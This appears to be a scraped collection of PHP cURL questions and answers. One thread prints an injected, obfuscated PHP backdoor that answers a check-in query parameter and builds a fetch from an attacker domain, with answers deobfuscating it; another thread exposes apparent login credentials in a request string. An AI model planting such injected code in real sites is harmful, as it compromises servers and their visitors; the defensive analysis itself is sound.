I searched all over, but have not seen anything related to this question. I have a curl script that obtains a random generated string of 10 characters from a website. I have received permission from the website owner to fetch this data and display it on my blog. My question is this when a user comes to my website it displays the string and if they refresh the page it will display a new string. How can I limit one string per user so that they cannot refresh over and over to obtain multiple strings?
Here is an example curl upon which my code is based:
$url = "http://m.www.yahoo.com/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
preg_match('/<dl class="markets clearfix strong small">(.*)<\/dl>/is', $output, $matches);
echo $matches[0];
curl_close($ch);
maybe you can use session variable to check if the user has already got a string.
function startSession(){
$id = session_id();
if ($id != '')
session_write_close();
if (isset($_COOKIE['PHPSESSID']) && $id != $_COOKIE['PHPSESSID']) {
session_write_close();
session_id($_COOKIE['PHPSESSID']);
}
session_start();
}
//Start your sessions
startSession();
if (!$_SESSION['UserGotAString']) {
echo "Some Error msg"
return;
}
session_write_close();
//Request to Yahoo and regex match comes here..
// Start a session
startSession();
$_SESSION['UserGotAString'] = true
echo $matches[0];
session_write_close();
Im not sure if this a good method. Also if you want to reset the session variable base on timer check this link
Set timeout in php
Related
I have been trying to send the xml response I have stored in '$kxml' variable to the 'kycresult.php' page. I want to fetch the values from that xml and just print it. I am able to fetch the values if I store the xml in txt file and then get it using 'simplexml_load_file' but I don't want to create an extra file. Please let me know if there is a way to send the $kxml on next page.
$kycch = curl_init();
curl_setopt($kycch, CURLOPT_URL, $csckua_url);
curl_setopt($kycch, CURLOPT_POSTFIELDS, $kycxml);
curl_setopt($kycch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($kycch, CURLOPT_TIMEOUT, 20);
$kycresult = curl_exec($kycch);
$curl_errno = curl_errno($kycch);
$curl_error = curl_error($kycch);
curl_close($kycch);
// echo $kycresult;
$kxml = simplexml_load_string($kycresult);
if ($kxml['ret'] == 'Y') {
// $ksuccess = 'Authentication Successful';
header('location:Kycresult.php');
} else {
$ksuccess = 'Authentication Failed';
}
As one of the possible solutions you can store the variable in session
session_start();
$_SESSION['kxml'] = $kxml;
Then on the next page it will be available through
$kxml = $_SESSION['kxml'];
But actually it still stores in the auxiliary file by default under the hood.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 1 year ago.
Improve this question
I have seen this code added to the server file. It looks like it is a malicious code, I can't seem a way to deobfuscate/decrypt this code.
<?php
#header('Content-Type:text/html;charset=utf-8');
error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
You can unravel this step by step.
There is this $OOOOOO string which then URL-decoded into $O, which yields the following (which looks like going through the keyboard row by row):
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";
From then on, in many places characters of this string are accessed (using the lesser-known and by now also deprecated braces syntax for array index access) and used to build new strings. We can replace all these $O{x} bits with the actual characters (I used a regex replace):
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "["."o"."k"."!"."]";
exit;
}else{
echo "["."f"."a"."i"."l"."!"."]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
We can then combine those strings to make them more readable:
if($_GET["chen"]=="51-cn"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
Now let's rename the confusing variables:
if($_GET["chen"]=="51-cn"){
$varA = file_get_contents(__FILE__);
$varB = explode("<?php",$varA);
if(strpos($varB[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$varC='z0807_1';
$varD="http://".$varC.".agoods.top";
function someFunction($varE){
$varF=curl_init();
curl_setopt ($varF, CURLOPT_URL, $varE);curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);$varG = curl_exec($varF);
curl_close($varF);
return $varG;
}
Next, let's split up the long line inside of the function:
if($_GET["chen"]=="51-cn"){
$varA = file_get_contents(__FILE__);
$varB = explode("<?php",$varA);
if(strpos($varB[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$varC='z0807_1';
$varD="http://".$varC.".agoods.top";
function someFunction($varE){
$varF=curl_init();
curl_setopt ($varF, CURLOPT_URL, $varE);
curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);
$varG = curl_exec($varF);
curl_close($varF);
return $varG;
}
As a final step, we can guess better names for those variables:
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__);
$parts = explode("<?php",$thisFileSource);
if(strpos($parts[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top";
function sendRequest($url){
$curl=curl_init();
curl_setopt ($curl, CURLOPT_URL, $url);
curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
As for what this code does: If this is called with query parameter chen=51-cn in the URL, it checks if the current file contains the start of that $OOOOOO string in the first PHP code section, and if it does, it returns [ok!], otherwise [fail!]. (This sounds entirely useless to me, because if the code wouldn't exist, then it wouldn't run either, so just echo "[ok!]"; would have sufficed...) Additionally, it prepares a request to http://z0807_1.agoods.top but it's never executed, at least not in the piece of code that you showed. (Maybe it's executed elsewhere in your code at some other place where code got injected too! Could be worth looking for ooooooooOOOOOOOOoooooOOO.)
Googling for "agoods.top" reveals a lot of seemingly unrelated sites that include in their contents what appears to be various PHP errors like Warning: mysqli::__construct(): (HY000/1040): Too many connections in /www/wwwroot/z0930_1.agoods.top/connect2.php on line 7. (How ironic, given that in the injected code, error output is suppressed.) Browsing these sites (which I did with a lot of care, so you don't have to!) shows that some of them act maliciously, for example redirecting the user to a fake "browser update" page after a few seconds, and many are just down by now. This makes me believe that those are also hijacked sites, and that the code was supposed to eventually pull HTML from the attacker's sites on zXXXX_X.agoods.top and inject it into the page, but the attacker messed up and also delivered PHP errors that way which ended up in Google's cache.
Because i always wonder what to expect if this would happen to me
i looked up what this code does.
First the commented code, and below the comments only.
DO NOT execute this on your machine!
// Sets header ...
#header('Content-Type:text/html;charset=utf-8');
// Disables error reporting (sure to not trigger notifications on owner side).
error_reporting(0);
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// ^ escaped by me
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
// Sets $O global (makes no sense to me).
global $O;
// decodes the url encoded string "qwertyuiopasdf...".
$O=urldecode($OOOOOO);
// $_GET['chen'] == '51-cn'
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
// Load this file into var.
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
// Explode by "<?php" (makes no sense to me).
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
// If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
// then echo "[ok!]" and exit
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
// else echo "[fail!]" and exit
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)
// Set sub domain on var.
$oOooOO='z0807_1';
// Set url "http://z0807_1.agoods.top" on var.
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
// Init curl.
#$ooooOOOooOo=curl_init();
// Set url (given function param).
#curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);
// CURLOPT_RETURNTRANSFER = 1 to not echo out response.
#curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);
// 5 sec connection timeout.
#curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);
// Execute and set response to NEW var.
#$oooooOOOOooO = curl_exec($ooooOOOooOo);
#curl_close($ooooOOOooOo);
// Return new var content.
#return $oooooOOOOooO;
}
Here the "just comments" part.
// Sets header ...
// Disables error reporting (sure to not trigger notifications on owner side).
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// Sets $O global (makes no sense to me).
// decodes the url encoded string "qwertyuiopasdf...".
// $_GET['chen'] == '51-cn'
// Load this file into var.
// Explode by "<?php" (makes no sense to me).
// If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
// then echo "[ok!]" and exit
// else echo "[fail!]" and exit
// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)
// Set sub domain on var.
// Set url "http://z0807_1.agoods.top" on var.
// Init curl.
// Set url (given function param).
// CURLOPT_RETURNTRANSFER = 1 to not echo out response.
// 5 sec connection timeout.
// Execute and set response to NEW var.
// Return new var content.
So this looks to me like
not the complete code that got injected
done by a bot that checks if the injection was successfully
a script to load more bad code into your project on deamand.
Lets hope you just got "marked" somewhere as "found" - so nothing really happened yet.
But i dont know that.
Could anyone share a working example of how to verify on my PHP server using cURL the Facebook access_token I got from the browser, so that I can verify the login details from the browser are trustworthy then safely create a session for my user on my server?
To review, the steps I want to make work are:
User clicks "Continue with Facebook" on the browser and gets an access_token.
I send this to my PHP server.
The server sends a cURL request to Facebook to validate the user access_token.
If access_token is valid, then create session for the user on my server.
I have my own app with email, Google and Facebook login. I appreciate any help, thanks.
After quite some time, I got a working PHP script.
Just replace the missing variable values and it should work. Also make
sure you have cURL working on your PHP server with phpinfo() or some other means;
<?php
///////////////////////////////////////
// prep Facebook verification
///////////////////////////////////////
// sanitize login data
$_POST['facebook_access_token'] = filter_var($_POST['facebook_access_token'], FILTER_SANITIZE_STRING);
// set variables
$facebook_user_access_token = $_POST['facebook_access_token'];
$my_facebook_app_id = 'REPLACE';
$my_facebook_app_secret = 'REPLACE';
$facebook_application = 'REPLACE'; // in my case 'domain.com', as set up in Facebook
///////////////////////////////////////
// get facebook access token
///////////////////////////////////////
$curl_facebook1 = curl_init(); // start curl
$url = "https://graph.facebook.com/oauth/access_token?client_id=".$my_facebook_app_id."&client_secret=".$my_facebook_app_secret."&grant_type=client_credentials"; // set url and parameters
curl_setopt($curl_facebook1, CURLOPT_URL, $url); // set the url variable to curl
curl_setopt($curl_facebook1, CURLOPT_RETURNTRANSFER, true); // return output as string
$output = curl_exec($curl_facebook1); // execute curl call
curl_close($curl_facebook1); // close curl
$decode_output = json_decode($output, true); // decode the response (without true this will crash)
// store access_token
$facebook_access_token = $decode_output['access_token'];
///////////////////////////////////////
// verify my access was legitimate
///////////////////////////////////////
$curl_facebook2 = curl_init(); // start curl
$url = "https://graph.facebook.com/debug_token?input_token=".$facebook_user_access_token."&access_token=".$facebook_access_token; // set url and parameters
curl_setopt($curl_facebook2, CURLOPT_URL, $url); // set the url variable to curl
curl_setopt($curl_facebook2, CURLOPT_RETURNTRANSFER, true); // return output as string
$output2 = curl_exec($curl_facebook2); // execute curl call
curl_close($curl_facebook2); // close curl
$decode_output2 = json_decode($output2, true); // decode the response (without true this will crash)
// test browser and Facebook variables match for security
if ($my_facebook_app_id == $decode_output2['data']['app_id'] && $decode_output2['data']['application'] == $facebook_application && $decode_output2['data']['is_valid'] == true) {
echo 'Success. Login is valid.';
}
else {
echo 'Error.';
}
?>
Special thanks to https://stackoverflow.com/a/16092226/6252345
I am trying to auto login to a site and redirect. I am doing this using curl here is my code but its not working for me I mean its not doing auto login even my login details are correct I can login directly but can't through curl php.
Here is my code:
function login($url,$data){
$fp = fopen("cookie.txt","w");
fclose($fp);
$login = curl_init();
curl_setopt($login,CURLOPT_COOKIEJAR,"cookie.txt");
curl_setopt($login,CURLOPT_COOKIEFILE,"cookie.txt");
curl_setopt($login,CURLOPT_TIMEOUT, 40000);
curl_setopt($login,CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($login,CURLOPT_URL,$url);
curl_setopt($login,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
curl_setopt($login,CURLOPT_FOLLOWLOCATION,TRUE);
curl_setopt($login,CURLOPT_POST,TRUE);
curl_setopt($login,CURLOPT_POSTFIELDS,$data);
ob_start();
return curl_exec($login);
ob_end_clean();
curl_close($login);
unset($login);
}
function grab_page($site){
$ch= curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch,CURLOPT_TIMEOUT,40);
curl_setopt($ch,CURLOPT_COOKIEFILE,"cookie.txt");
curl_setopt($ch,CURLOPT_URL,$site);
ob_start();
return curl_exec($ch);
ob_end_clean();
curl_close($ch);
unset($ch);
}
function post_data($site,$data){
$datapost = curl_init();
$headers=array("Expect:");
curl_setopt($datapost,CURLOPT_URL,$site);
curl_setopt($datapost,CURLOPT_TIMEOUT,40000);
curl_setopt($datapost,CURLOPT_HEADER,TRUE);
curl_setopt($datapost,CURLOPT_HTTPHEADER,$headers);
curl_setopt($datapost,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
curl_setopt($datapost,CURLOPT_POST,TRUE);
curl_setopt($datapost,CURLOPT_POSTFIELDS,$data);
curl_setopt($ch,CURLOPT_COOKIEFILE,"cookie.txt");
ob_start();
return curl_exec($datapost);
ob_end_clean();
curl_close($datapost);
unset($datapost);
}
echo login("https://www.jollywallet.com/api/aff","token=00D3A9E8-A9F4-F21B-122E-54AF4B00A0E8&captcha%5Binput%5D=&captcha%5Bid%5D=&type=login&user=armokoj#gmail.com&dist_id=0&dist_sub_id=0&password=4704e86d0ea8a20752a9b882b9a2a5f9®_option=2");
echo grab_page("https://www.jollywallet.com/jollywallet/storelist");
you don't explain what is your error.
if you are login and get right response from server but web redirect or use another curl to go to another page but response of second curl is login page its back to your cookie. yes I know you save cookie but some site use a javascript to set cookie then must browser load the page to get right cookie or other thing that cause cookie is not work well
if your first curl that use to login back a wrong response then you don't send some data. some site use hidden input must send them and in some case value of that hidden input fill with javascript and you must fill it yourself
I hope this help you
I have the following function to get the last access date of googlebot:
//get googlebot last access
function googlebot_lastaccess($domain_name)
{
$request = 'http://webcache.googleusercontent.com/search?hl=en&q=cache:'.$domain_name.'&btnG=Google+Search&meta=';
$data = getPageData($request);
$spl=explode("as it appeared on",$data);
//echo "<pre>".$spl[0]."</pre>";
$spl2=explode(".<br>",$spl[1]);
$value=trim($spl2[0]);
//echo "<pre>".$spl2[0]."</pre>";
if(strlen($value)==0)
{
return(0);
}
else
{
return($value);
}
}
echo "Googlebot last access = ".googlebot_lastaccess($domain_name)."<br />";
function getPageData($url) {
if(function_exists('curl_init')) {
$ch = curl_init($url); // initialize curl with given url
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); // add useragent
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // write the response to a variable
if((ini_get('open_basedir') == '') && (ini_get('safe_mode') == 'Off')) {
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // follow redirects if any
}
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); // max. seconds to execute
curl_setopt($ch, CURLOPT_FAILONERROR, 1); // stop when it encounters an error
return #curl_exec($ch);
}
else {
return #file_get_contents($url);
}
}
But this script prints me as result the snapshot of the whole page in screen, ie. the whole page cached in google but I want to capture only the date time after words as it appeared on and print it ie.: 8 Oct 2011 14:03:12 GMT.
How to?
Change this line:
echo "Googlebot last access = ".googlebot_lastaccess($domain_name)."<br />";
with this:
$content = googlebot_lastaccess($domain_name);
$date = substr($content , 0, strpos($content, 'GMT') + strlen('GMT'));
echo "Googlebot last access = ".$date."<br />";
Why query Google as to when it was last at your site when you can detect Googlebot on your site and what pages its on? It will also allow you to track where Googlebot went with a simple write to database function.
See Stack Overflow question how to detect search engine bots with php?